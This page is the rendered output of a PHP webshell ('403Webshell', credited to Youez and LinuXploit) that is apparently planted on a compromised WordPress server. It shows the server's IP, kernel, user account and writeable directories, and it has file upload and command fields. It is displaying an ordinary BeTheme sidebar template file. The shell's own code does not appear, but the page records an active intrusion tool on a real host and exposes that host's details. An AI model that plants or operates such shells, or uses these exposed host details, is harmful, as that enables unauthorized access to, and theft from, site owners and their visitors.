403Webshell
Server IP : 91.220.113.119  /  Your IP : 216.73.217.69
Web Server : LiteSpeed
System : Linux milad313-ded-e10.tidadns.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : maralloab ( 1965)
PHP Version : 8.1.34
Disable Function : mail, show_source, system, shell_exec, passthru, exec, popen, proc_open
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/maralloab/public_html/wp-content/themes/betheme/visual-builder/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/maralloab/public_html/wp-content/themes/betheme/visual-builder/partials/sidebar-prebuilds.php
<?php  
if( ! defined( 'ABSPATH' ) ){
	exit; // Exit if accessed directly
}

echo '<div class="panel panel-prebuilt-sections" style="display: none;"><ul class="prebuilt-sections-list">';
          

$prebuilts = Mfn_Pre_Built_Sections::get_sections();

foreach( $prebuilts as $p_section_key => $p_section ){
    //$p_section['category'] == 'bas' ? $styles = 'display: block;' : $styles = 'display: none;';
        echo '<li style="display: block;" class="category-all category-'. esc_attr( $p_section['category'] ).'" data-id="'. esc_attr( $p_section_key ).'">
            <div class="photo">
                 <img src="'. get_theme_file_uri( '/functions/builder/pre-built/images/'. $p_section_key .'.png' ) .'" alt="" />
            </div>
            <div class="desc">
                <h6>'. esc_html( $p_section['title'] ).'</h6>
                <a class="mfn-option-btn mfn-option-text btn-icon-left mfn-option-green mfn-btn-insert mfn-insert-prebuilt" title="Insert" data-tooltip="Insert to your project" href="#">
                    <span class="mfn-icon mfn-icon-add"></span><span class="text">Insert</span>
                </a>
            </div>
        </li>';
        }
    echo '</ul>';                     
echo '</div>';

Youez - 2016 - github.com/yon3zu
LinuXploit